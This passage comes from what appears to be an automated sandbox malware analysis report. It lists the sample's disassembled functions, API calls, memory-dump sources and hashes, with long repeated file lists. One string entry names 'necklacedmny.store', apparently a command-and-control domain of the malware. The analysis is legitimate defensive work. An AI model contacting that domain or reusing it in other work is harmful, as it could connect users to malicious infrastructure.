                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID: 7CB170F54527605EE227D36909F09D60$Mz$necklacedmny.store$tO
                                                                        • API String ID: 640775948-2168123166
                                                                        • Opcode ID: cd141b7cd514857bfec6ff396270fd006622ca2027bb4d2fa109cc2ded540859
                                                                        • Instruction ID: 28cfe5bbafed4a785a3f4de567c847dfc7c72d9688b86a40bcdb08b23409c0fe
                                                                        • Opcode Fuzzy Hash: cd141b7cd514857bfec6ff396270fd006622ca2027bb4d2fa109cc2ded540859
                                                                        • Instruction Fuzzy Hash: FCA120B05047828FE325CF25C8907A3BBA2FF52304F19899CD0D64BB56D775E886CB91
                                                                        Function 00630DAD Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 8dde4927c1eda5513760ab4a2365b336eac87feedd4649de95acfebb22308d25
                                                                        • Instruction ID: b5635becabf98dabb11ca7aa0d9bae429acce419b587a8e934757c2ff8aeef35
                                                                        • Opcode Fuzzy Hash: 8dde4927c1eda5513760ab4a2365b336eac87feedd4649de95acfebb22308d25
                                                                        • Instruction Fuzzy Hash: 9531F6312057818FD7258F29C4907A2BBE3BF9A301F2886ADD0D64B752C735A886CB90
                                                                        Function 00610B90 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 00610C8D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: eaae6ef7cbed89d5dc5858b730e6fa6ba23ebb22338f6ec68214f4e032004373
                                                                        • Instruction ID: d49de5e5aad022a9aeb6e09b25396b303101b35856cf793b12c68e1549f2b659
                                                                        • Opcode Fuzzy Hash: eaae6ef7cbed89d5dc5858b730e6fa6ba23ebb22338f6ec68214f4e032004373
                                                                        • Instruction Fuzzy Hash: 8D31CCB5D10B40ABD730BE3D9A0B6177DB4A702660F40472DF8E69A6C4F230A4298BD7
                                                                        Function 00640E25 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00640ED8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 15d7ca51e4c543ae6b7e34691cccf9b55d9d4ee7dbce3217e862d72d8284b185
                                                                        • Instruction ID: 4f0e3bc1759d1ff06af53e742b9b6259147e0f78c4b1ea7f357cec78e72c9172
                                                                        • Opcode Fuzzy Hash: 15d7ca51e4c543ae6b7e34691cccf9b55d9d4ee7dbce3217e862d72d8284b185
                                                                        • Instruction Fuzzy Hash: 3511BD33F501228BDB1C8F78EC616AD7756FB05324B090AB9E916E7280DB79DA0047C0
                                                                        Function 0063E1B0 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0063E204
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 54f0c51761d78a8fb583116b92e5d055e0935963f0400b85410539033e7c92e5
                                                                        • Instruction ID: 90646133149cfe94cc364317959c7fb118395a1de35d233737c8362a5639bb4c
                                                                        • Opcode Fuzzy Hash: 54f0c51761d78a8fb583116b92e5d055e0935963f0400b85410539033e7c92e5
                                                                        • Instruction Fuzzy Hash: C7F0E97429D3405BD3088B10DCA176A7FA69BE1305F08487EE4D107391C67A181DD777
                                                                        Function 00634AC6 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
